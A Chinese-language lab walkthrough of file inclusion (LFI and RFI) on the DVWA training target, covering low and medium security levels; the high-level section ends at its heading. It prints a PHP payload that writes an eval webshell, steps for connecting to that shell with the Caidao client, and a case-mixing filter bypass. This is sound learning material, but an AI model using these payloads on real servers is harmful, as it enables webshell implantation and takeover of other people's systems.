漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)
文件包含漏洞原理介绍
在通过PHP的相应函数(比如include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
文件包含漏洞的形成,需要满足两个条件:
include()等函数通过动态变量的方式引入需要包含的文件
用户能够控制这个动态变量
本地文件包含(LFI)
- 能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞。
远程文件包含(RFI)
- 如果php.ini的配置选项allow_url_include为ON的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令。
文件包含漏洞高危函数
- include()
- require()
- include_once()
- require_once()
- 对文件进行操作的其他函数,如f_open(),f_read()
文件包含漏洞危害
- 敏感信息泄露
- 获取Webshell
- 任意命令执行
实验环境:
环境搭建
打开php的配置文件,搜索allow_url_include,把off换成on,然后重启
模拟实验
DVWA Securitylow級別
low级别源码
本地文件包含(LFI)
1、点击File Inclusion中的file1.php
2、在图示位置输入C:\Windows\System32\drivers\etc\hosts就可以看到hosts里的内容了
远程文件包含(RFI)
1、查看本机IP
2、在www目录下创建一个内容为<?php phpinfo();?>的txt文件
3、在浏览器中输入IP和创建的文件,内容只显示不执行
4、复制URL,粘贴到DVWA的page=下,能够执行
5、将txt内容改为<?php $file = fopen("a.php","w");fputs($file,'<?php @eval($_REQUEST[666]);?>')?>,然后刷新页面
6、在fi后加入a.php?666=phpinfo();可以正常显示
7、复制地址http://192.168.1.4/DVWA-master/vulnerabilities/fi/a.php
8、打开菜刀添加网址,输入666密码连接
9、点击添加的连接对象,成功进入
DVWA SecurityMedium級別
Medium級別源码
本地文件包含(LFI)
这里与低级别一样C:\Windows\System32\drivers\etc\hosts路径能够正常执行
远程文件包含(RFI)
这里只需把http、https掺入大小写即可
DVWA SecurityHigh級別
High級別源码